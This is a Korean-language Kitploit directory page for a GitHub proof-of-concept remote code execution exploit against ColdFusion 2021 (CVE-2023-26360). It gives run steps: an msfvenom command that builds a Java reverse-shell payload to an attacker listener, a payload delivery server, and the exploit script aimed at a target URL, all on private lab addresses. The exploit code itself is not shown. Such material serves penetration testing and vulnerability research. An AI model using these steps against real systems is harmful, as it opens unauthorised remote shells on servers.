Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-26360-RCE — ColdFusion 2021(CVE-2023-26360) 원격 코드 실행 익스플로잇 | Kitploit
도구/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

ColdFusion 2021(CVE-2023-26360) 원격 코드 실행 익스플로잇

저장소 보기
11310개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-26360 - ColdFusion 2021 원격 코드 실행

때때로 스크립트가 첫 시도에 작동하지 않습니다. 작동할 때까지 몇 번 시도해 보세요

실행 방법

msfvenom으로 페이로드 생성

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

server.py 시작하기

  • 이 서버는 cve.2023-26360.py를 통한 초기 접근 후 Coldfusion 서버로 페이로드를 전송하므로, 먼저 초기화되어 있어야 합니다.
root@kitploit:~
python3 server.py 8000
  • 8000 인자는 서버가 수신 대기할 포트입니다.

  • 12번째 줄에서 서버 IP 주소를 구성하므로 이를 변경해야 한다는 점에 유의하세요:

root@kitploit:~
s.bind(('192.168.56.1',port))

cve-2023-26360.py 실행

  • 익스플로잇을 실행하려면 다음을 실행하세요:
root@kitploit:~
python3 cve-2023-26360.py 8000
  • server.py와 마찬가지로 8000 인자는 server.py가 수신 대기할 포트입니다. 따라서 두 명령 모두에서 동일해야 합니다.

  • cve-2023-26360.py의 8번째 줄은 server.py가 수신 대기할 IP 주소를 설정합니다. 이를 올바르게 구성해야 합니다.

  • cve-2023-26360.py의 11번째 줄은 Coldfusion 서버의 IP 주소를 설정하므로 변경하세요:

root@kitploit:~
url = "http://192.168.56.102:8500"

테스트 환경

  • ColdFusion 2021 - Windows Server 2019
도구 다운로드